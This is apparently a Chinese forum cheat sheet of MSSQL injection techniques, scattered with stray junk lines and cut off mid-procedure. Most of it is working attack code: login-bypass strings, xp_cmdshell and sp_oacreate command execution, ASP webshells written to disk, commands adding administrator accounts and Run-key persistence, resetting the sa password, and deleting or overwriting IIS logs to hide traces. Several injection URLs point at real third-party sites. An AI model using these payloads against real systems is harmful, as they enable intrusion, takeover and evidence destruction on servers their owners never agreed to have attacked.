Mssql injection code

admin

                                                                             （1）                                                                           
判断数据库类型:                                                                                 
7 w8 U/ f) @) x2 V$ _; F8 j
Access:
8 \! M- A% ~) A0 L0 }9 V. W
8 @- f. J+ i2 `  u) s aNd aSc(cHr(97))=97
and exists(select id from MSysAccessObjects)


SQL Server:
and exists(select id from sysobjects)

; K5 D! F" A+ K
MySQL:
and length(user())>0                                                
) J2 q) J' P& x5 V5 ~( J                                                                                 
) F" b  z- e2 }9 j                                                                                 
; C3 R9 f5 C8 s. [1 ^4 n搜索栏里输入
关键字%'and 1=1 and '%'='
/ K/ [) ^" Z; u* R& o+ ?关键字%'and 1=2 and '%'='
比较不同处 可以作为注入的特征字符
$ c: H/ d# B: Q; [0 p
2 k: J. i( w+ g# Y# X- i# ]1、    用^转义字符来写ASP(一句话木马)文件的方法:
: V0 K) D3 v, [
   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
( U1 R( n. P( c
* }  l9 [$ \5 _& v# ~" U$ g   echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

    显示SQL系统版本：
. ?* _& P$ U" ]* ~4 p9 z9 I: P: r  http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
  
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--
& W8 [7 i9 `. C- w( q
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp，行242
4 c/ S- k) g# [" ^8 fMicrosoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp，行17
( ]) _6 B+ Y0 e0 q3 [3、    在检测索尼中国的网站漏洞时，分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用“in”关键字进行查询，例如“select * from mytable where id in(1)”，括号中的值就是我们提交的数据，它的结果与使用“select * from mytable where id=1”的查询结果完全相同。所以访问页面的时候在URL后面加上“) and 1=1 and 1 in(1”后原来的SQL语句就变成了“select * from mytable where id in(1) and 1=1 and 1 in(1)”，这样就会出现期待已久的页面了。暂且就叫这种类型的漏洞为“包含数字型”吧，聪明的你一定想到了还有“包含字符型”呢。对了，它就是由于类似“select * from mytable where name in('firstsee')”的查询语句造成的。
' ]( n2 c. _- m' X" C( J
4、    判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
恢复xp_cmdshell扩展存储的命令：
5 R) q' X- l: j$ r- l" lhttp://www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
7 v5 Q# C' j7 b# b/ C9 m4 V" [
5、    向启动组中写入命令行和执行程序：
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'
. Q2 X1 u" }3 m! E
8 Y8 Q9 ]3 C4 k4 n, P
* F6 _& s, O7 H6、    查看当前的数据库名称：
. c- W# O4 F; h& h$ m5 l5 _?   http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) n改成0,1,2,3……就可以跨库了
?   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
: @5 u0 ?; y6 I, @Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
7 M9 i& V) r7 c( y) _3 i  W( c/iisHelp/common/500-100.asp，行242
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
0 L! S1 M8 E5 `/ K. d[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
- z+ h7 v" b+ T. P' _& G& t. W- H/display.asp，行17
" J1 @, K7 V8 E& ^8 W1 @. Q7、    列出当前所有的数据库名称：
/ G' u# f; c" q- \* nselect * from master.dbo.sysdatabases    列出所有列的记录
select name from master.dbo.sysdatabases 仅列出name列的记录
5 ^5 k# @/ m8 r5 L
8、    不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令：
create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
3 H. V0 u# C8 X  U# }& f9 e" `4 YDECLARE @shell INT
9 `0 N/ ?8 M6 O. tDECLARE @fso INT
' d9 ~9 H0 i; H& R  [' I' BDECLARE @file INT
DECLARE @isEnd BIT
' l, ], W) h+ g" ]8 z$ T. CDECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
5 b/ i7 ~  O( xEXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
# o0 I) r9 \8 U$ C--注意run的参数true指的是将等待程序运行的结果，对于类似ping的长时间命令必需使用此参数。

EXEC sp_oacreate 'scripting.filesystemobject',@fso output
  f. E/ v' j1 k2 k# z: ~EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--因为fso的opentextfile方法将返回一个textstream对象，所以此时@file是一个对象令牌
) J, v" {, @- t: I* B0 d
WHILE @shell>0
BEGIN
$ n9 ^, p! K) e5 v0 V4 H6 FEXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
( C$ z( I! V$ }, S$ t9 x; OELSE CONTINUE
4 p+ \% u1 g) h- A% lEND

. [9 W. k7 V9 m2 x4 Mdrop TABLE MYTMP
; v  H4 E# P9 N1 J+ m- A
. d* O8 ~6 \' h1 G+ J2 M/ F# q----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
+ q0 _! h$ u& `* k  e# o$ _DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
* |8 i" k7 e" a4 w! k% |8 ~EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
1 u- ^, `& Q# ?( C; SEXEC sp_oacreate 'scripting.filesystemobject',@fso output
1 U0 A6 `5 x/ t+ H/ U% H; r) ?EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
- r+ ~' G$ J2 p4 ]- e2 ~2 kWHILE @shell>0
BEGIN
$ d3 U  o% U! o9 X% L+ ?EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
  D9 w; ^: U6 S( T$ ]EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
* h  \& J, F. h4 o" A- QEND

以下是一行里面将WEB用户加到管理员组中：
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
( t1 z: R/ T3 o7 K
以下是一行中执行EXE程序：
$ q% m3 c7 z, `: b- P1 j; k: O' |# BDECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

SQL下三种执行CMD命令的方法：
- }3 g7 f' G; Y9 Z
先删除7.18号日志：
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'
8 B) i0 O' U, c% ~; K
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
2 m! R" ~! m: R
1 t0 O! Z, e. P8 l; p: x（3）首先开启jet沙盘模式，通过扩展存储过程xp_regwrite修改注册表实现，管理员修改注册表不能预防的原因。出于安全原因，默认沙盘模式未开启，这就是为什么需要xp_regwrite的原因，而xp_regwrite至少需要DB_OWNER权限，为了方便，这里建议使用sysadmin 权限测试：
, e1 t$ s8 f% H  @+ c3 i?    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
( Y7 I/ h( q( z* @" z& h( c. t注：
6 a, j. t. o/ C' G: y9 F$ o& p0    禁止一切（默认）
3 |) L, `2 ~9 V1    使能访问ACCESS，但是禁止其它
2 u# y5 o+ \0 k! y2 k2 d( @2    禁止访问ACCESS，但是使能其他
3    使能一切

& R. a# H3 [5 Q! k6 Z2 Q. Y?    这里仅给出sysadmin权限下使用的命令：
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')


% Z: `8 c5 L4 w?    建立链接数据库'L0op8ack'参考命令：
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'
' k# B4 y3 t9 a. ^
4 R3 W' f  v5 J& f, _/ f?    如何使用链接数据库：

. X. P  s, X! P9 v4 d使用这个方式可以执行，但是很不幸，DB_OWNER权限是不够的，需要至少sysadmin权限或者securityadmin+setupadmin权限组合
sp_addlinkedserver需要sysadmin或setupadmin权限
sp_addlinkedsrvlogin需要sysadmin或securityadmin权限
1 V( H/ U/ A! i7 ~5 \6 H最终发现，还是sa权限或者setupadmin+securityadmin权限帐户才能使用，
5 n! `7 |, X7 H5 {& o' r4 j一般没有哪个管理员这么设置普通帐户权限的

实用性不强，仅作为一个学习总结吧

& x$ A6 k' X- e& l大致过程如下，如果不是sysadmin，那么IAS.mdb权限验证会出错，
: f8 v* _. b5 y$ q5 O# b我测试的时候授予hacker这个用户setupadmin+securityadmin权限，使用ias.mdb失败
" C- G  b# T8 M9 Y& f, g! r: h需要找一个一般用户可访问的mdb才可以：

?    新建链接服务器”L0op8ack”:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
?    exec sp_addlinkedsrvlogin 'L0op8ack','false';--或
exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
?    select * FROM OPENQUERY(L0op8ack, 'select shell("cmd.exe /c net user")');--
?    exec sp_droplinkedsrvlogin 'L0op8ack','false';--
?    exec sp_dropserver 'L0op8ack';--

/ r0 T* _4 `$ ^4 }! k% v$ c: a' X再考贝一个其它文件来代替7.18日文件：
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
6 t$ J% U  [" K9 b; V
+ j" w) `) |5 I& M(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
- D/ C+ R: o5 w
8 U. c0 B  N- i5 N9、    用update来更新表中的数据：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
+ C/ d" V* y% {- l4 Cwww用户密码的16位MD5值为：a0b923820dcc509a，即把密码改成1；
32位MD5值为：    ，密码为

; A5 O) o0 B! ^$ O2 v! @4 N10、    利用表内容导成文件功能
* k. Y' ?4 V5 L$ _SQL有BCP命令，它可以把表的内容导成文本文件并放到指定位置。利用这项功能，我们可以先建一张临时表，然后在表中一行一行地输入一个ASP木马，然后用BCP命令导出形成ASP文件。
命令行格式如下：
: D2 |+ p: }) w$ t8 Dbcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P upload('S'参数为执行查询的服务器，'U'参数为用户名，'P'参数为密码，最终上传了一个runcommand.asp的木马)。

) H, }( K1 u; Z. Q9 N5 [5 {11、创建表、播入数据和读取数据的方法
?    创建表：
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
8 y+ x% B/ `" t1 o" z4 Z?    往表里播入数据：
8 p: t! v0 R. |$ J# y' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
: Z6 z  Z9 `& j$ Z) I2 j% k( C?    从表里读取数据：
' and 1=(select count(*) from cyfd where gyfd >1)--
# L. G; [+ E5 ~
?    删除临时表：
4 B) u1 K# W# y( s, {5 j';drop table cyfd;--

4 H+ v! V) J8 A4 C- X6 z% u! b" l12、通过SQL语句直接更改sa的密码：
# c$ ~) x7 k( c?    update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,这样sa的密码就被我们改成了111111拉。呵呵，解决的方法就是把sa给删拉。，怎么删可以参考我的《完全删除sa这个后门》。

?    查看本机所有的数据库用户名：
% _7 x% r9 o- ~select * from master.dbo.sysxlogins
& Z% S7 h& L) b% R1 ]select name,sid,password ,dbid from master.dbo.sysxlogins

* U0 U7 p! J# ?6 v?    更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

13、查询dvbbs库中所有的表名和表结构：
?    select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
?    select * from dvbbs.dbo.syscolumns where id=1426104121

14、手工备份当前数据库：
  l+ R7 h% [4 M完全备份：
5 x) f9 C3 _4 E9 l- S" k;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT--
+ P8 w7 m" \+ n差异备份：
; M2 l) i* V! W4 B' \;declare @a sysname,@s nvarchar(4000)
. J2 h) U( E' n* \) j! uselect @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT—
+ R2 `/ P! l& k3 ?% H1 h
7 {, X- C7 a: V* }0 g15、添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,ptlove
7 H. t  C# W6 T; u$ r  yexec master.dbo.sp_addsrvrolemember test,sysadmin
, B0 B3 a$ [* P
cmd.exe /c isql -E /U alma /P /i K:\test.qry

! S' k9 M' P$ ]1 Z9 F! \16、select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
就可以列出库ChouYFD中所有的用户建立的表名。
; m9 T% @+ l8 iselect name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0

& y1 b2 y  H* T7 V17、
?   http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns （where id=1234）
$ F  [( l8 }0 D! E: f/ Q5 h7 D列出rdweb库中所有表中的字段名称
?    select * from dvbbs.dbo.syscolumns where id=5575058
3 ^; s5 m, l5 C) a) K" W" |0 k& i列出库dvbbs中表id=5575058的所有字段名
$ D: t9 f3 c4 i" s  B
18、删除记录命令：delete from Dv_topic where boardid=5 and topicid=7978

4 b# H  \6 N* X19、绕过登录验证进入后台的方法整理：
1) ' or''='
4 n! w. \8 ^8 B# q, i! M2) ' or 1=1--
3) ' or 'a'='a--
4) 'or'='or'
) w1 a* Q+ J4 {/ q( q3 i5) " or 1=1--
; `; _  `7 b  b- o* V) M1 K6）or 1=1--
7） or 'a='a
5 R0 }- |- |+ ^; f+ {8）" or "a"="a
0 F6 J8 T3 ^3 M1 M9） ') or ('a'='a
4 t  A* |4 |+ Y# w. e. M10） ") or ("a"="a
: y& z7 ]% v  ]: w$ X& X% r11） ） or (1=1
12) 'or''='
13) 人气%' and 1=1 and '%'='
, z) J3 y& c; v+ h
! K+ f2 T/ E. q9 x9 _1 B' g& v  C20、寻找网站路径的方法汇总：
1）查看WEB网站安装目录命令：
?    cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt （将2换成1、3、4、5试试）
$ N! ~& Q! ~& B6 atype c:\test1.txt
del c:\test1.txt
! ~" l2 A" W4 r在NBSI下可以直接显示运行结果，所以不用导出到文件

2）在网站上随便找到一个图片的名字 123.jpg
, O2 @+ S, y: P) `$ q然后写进批处理程序123.bat:
( E- h4 \+ @3 G) C3 x; fd:
dir 123.jpg /s >c:\123.txt
e:
' _9 }( [( i# W) rdir 123.jpg /s >>c:\123.txt
  `$ n: S8 q2 J7 f( }9 I& `f:
: {: F4 v4 x1 D( g2 W$ e5 Ldir 123.jpg /s >>c:\123.txt

' x1 C8 q. y' h) ~  p) p& }执行后 type c:\123.txt
7 Z6 e0 o: c( |, s; G  T这样来分析网站的路径
8 W5 t: T' Q# [$ Y0 L
5 [+ Y" `' l) K; z6 i/ a3）SQL服务器和网站服务器在同一个服务器上，好了是可以执行命令是吧？
+ ~/ h" b; S( F8 {: f将执行命令输出结果到
%windir%\help\iishelp\common\404b.htm或者500.asp
注意输出前Backup这两个文件
如：
dir c:\ >%windir%\help\iishelp\common\404b.htm
; B* w, e( t  O然后随便输入一个文件来访问：http://目标ip/2.asp
( K3 G7 W6 m% g/ Q3 I3 h2 x& e
4）针对win2000系统：xp_regread读取HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots 获取WEB路径
2003系统：xp_regread读取，未找到方法
0 p' S  W, n, Y* R# `' k如：
. v" Q. ~7 P& A2 _, s（1）    新建一个表cyfd(字段为gyfd)：http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
1 C- D+ p; b, |1 [8 J" L# n4 M, S（2）    把web路径写进去:http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
（3）    还是让他不匹配，显示错误:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: 将 varchar 值 'Y:\Web\烟台人才热线后台管理系统,,201 ' 转换为数据类型为 int 的列时发生语法错误。
: _: i& x8 E0 I+ n" f/ R) MTargeSite: Boolean Read() 哈哈哈。。路径暴露了。。
8 L9 u6 W2 r$ V（4）接下来删除表:http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--

8 s4 T: a9 M* c6 Z, M% w  U6 E/ [5）用regedit命令导出注册表，将导出的结果保存的路径到%windir%\help\iishelp\common\404b.htm或者500.asp页面
regedit命令说明：
; D3 M0 |% B. X+ k0 nRegedit /L:system /R:user /E filename.reg Regpath
参数含义：
2 \+ t* B8 T4 ?, f* D7 [- o/L：system指定System.dat文件所在的路径。
/R：user指定User.dat文件所在的路径。
# a% R7 t8 Z; F  g3 U: i/E：此参数指定注册表编辑器要进行导出注册表操作，在此参数后面空一格，输入导出注册表的文件名。
2 j, e, ^/ @. Y% {$ B. JRegpath：用来指定要导出哪个注册表的分支，如果不指定，则将导出全部注册表分支。在这些参数中，"/L：system"和"/R：user"参数是可选项，如果不使用这两个参数，注册表编辑器则认为是对WINDOWS目录下的"system.dat"和"user.dat"文件进行操作。如果是通过从软盘启动并进入DOS，那么就必须使用"/L"和"/R"参数来指定"system.dat"和"user.dat"文件的具体路径，否则注册表编辑器将无法找到它们。比如说，如果通过启动盘进入DOS，则备份注册表的命令是"Regedit /L:C:\windows\/R:C:\windows\/e regedit.reg",该命令的意思是把整个注册表备份到WINDOWS目录下，其文件名为"regedit.reg"。而如果输入的是"regedit /E D:\regedit.reg"这条命令，则是说把整个注册表备份到D盘的根目录下（省略了"/L"和"/R"参数），其文件名为"Regedit.reg"。
1 W0 A+ o+ ~" a/ B9 a9 j+ j) J
9 z5 i! f/ M) S3 S. Aregedit /s c:\adam.reg （导入c:\adam.reg文件至注册表）
regedit /e c:\web.reg （备份全部注册内容到c:\web.reg中）
8 }( q; i# o0 A$ C针对win2000系统：C:\>regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
然后http://目标IP/2.asp
* p" B4 ~) C3 j- d& s针对win2003系统：没有找到，希望找到的朋友公布出来一起讨论。

6）虚拟主机下%SystemRoot%\system32\inetsrv\MetaBack\下的文件是iis的备份文件，是允许web用户访问的，如果你的iis备份到这里，用webshell下载下来后用记事本打开，可以获取对应的域名和web绝对路径。
( P9 u) O# v+ r8 H- b) r# I
9 M& |# c' n4 u8 D, m/ Q' w! K1 Q% _7）SQL注入建立虚拟目录，有dbo权限下找不到web绝对路径的一种解决办法：
$ w) ^' E. {- j8 l3 a; O我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错：
?    建立虚拟目录win,指向c:\winnt\system32：exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
, u3 ]/ t0 ]8 T?    让win目录具有解析asp脚本权限：exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" –s:'
?    删除虚拟目录win：exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
?    测试：http://127.0.0.1/win/test.asp
& b. m8 _: M4 c2 W8）利用SQL语句来查找WEB目录：根据经验，猜疑WEB根目录的顺序是：d盘、e盘、c盘，首先我们建立一个临时表用于存放master..xp_dirtree(适合于public)生成的目录树,用以下语句：
# b; K8 I* u' T! u;create table temp(dir nvarchar(255),depth varchar(255));--,该表的dir字段表示目录的名称，depth字段表示目录的深度。然后执行xp_dirtree获得D盘的目录树，语句如下：
;insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:';--

* Q) ^/ V8 c4 v. a: V3 F4 L在进行下面的操作前，先查看D盘有几个文件夹，这样对D盘有个大致的了解，语句如下：
) I. R6 |9 ^! J, B4 J: band (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷'))>=数字(数字=0、1、2、3...)

接着，我们在对方的网站上找几个一级子目录，如user、photo，然后，用筛选的方法来判断WEB根目录上是否存在此盘上，语句如下：
+ S2 V$ E/ @. D# C2 x/ {and (select count(*) from temp where dir<>'user')<(select count(*) from temp)
# Q2 L6 X3 W1 g% w
# L% Z* k- T5 T6 O, _看语句的返回结果，如果为真，表示WEB根目录有可能在此盘上，为了进一步确认，多测试几个子目录：
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)
2 b4 J4 H, Z: h3 k8 e0 {
$ }+ M7 I) F$ C2 R/ X" D...
9 a. Q6 I* P* G: M$ o
如果所有的测试结果都为真，表示WEB根目录很有可能在此盘上。

下面假设找到的WEB根目录在此盘上，用以下的语句来获得一级子目录的深度：
: [+ T" n$ a; ^$ R# |$ r8 Land (select depth from temp where dir='user')>=数字(数字=1、2、3...)

3 h% n6 V. {$ r/ s' R8 P假设得到的depth是3,说明user目录是D盘的3级目录，则WEB根目录是D盘的二级目录。
5 ]7 v  B, a8 K; Q% [
8 @! w, P( a4 U* }+ q8 W目前我们已经知道了根目录所在的盘符和深度，要找到根目录的具体位置，我们来从D盘根目录开始逐一搜寻，当然，没有必要知道每个目录的名称，否则太耗费时间了。

- M3 @0 w7 A& t2 q. O8 W接下来，另外建立一个临时表，用来存放D盘的1级子目录下的所有目录，语句如下：

;create table temp1(dir nvarchar(255),depth varchar(255));--

然后把从D盘的第一个子目录下的所有目录存到temp1中，语句如下：
' i; j; A! {- H' zdeclare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
  n/ j4 y0 y  f2 Z当然也可以把D盘的第二个子目录下的所有目录存到temp1中，只需把第二个top 1改为top 2就行了。
4 u  R6 e2 j  w% h8 l6 d8 a- l
2 D" f+ Y+ W  ^3 e, y& A, v" y# x现在，temp1中已经保存了所有D盘第一级子目录下的所有目录,然后，我们用同样的方法来判断根目录是否在此一级子目录下：
9 {: F# _8 {, U& r  t9 Q$ Zand (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
; D: T, s% r& j7 u如果返回为真，表示根目录可能在此子目录下，记住要多测试几个例子，如果都返回为假，则表明WEB根目录不在此目录下，然后我们在用同样的方法来获得D盘第2、3...个子目录下的所有目录列表，来判断WEB根目录是否在其下。但是，要注意，用xp_dirtree前一定要把temp1表中的内容删除。

# l$ M7 R$ t) g) b现在假设，WEB根目录在D盘的第一级子目录下，该子目录名称为website,怎样获得这个目录的名称我想不用我说了吧。因为前面我们知道了WEB根目录的深度为2，我们需要知道website下到底哪个才是真正的WEB根目录。
. }+ @# {" W* {2 Y9 j# _
现在，我们用同样的方法，再建立第3个临时表：
+ z4 c8 [1 Q6 S0 b;create table temp2(dir nvarchar(255),depth varchar(255));--
& F% }4 d& I, @1 u0 J
然后把从D盘的website下的所有目录存到temp2中，语句如下：
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
8 ?9 m7 K2 a8 z! T8 e9 T1 f+ C( h/ I当然也可以把D盘的website下第二个子目录下的所有目录存到temp2中，只需把第二个top 1改为top 2就行了。
' E" b1 \& P# j& V; @
/ i2 Q$ B) K0 F- ~" l. r现在，我们用同样的方法判断该目录是否为根目录：
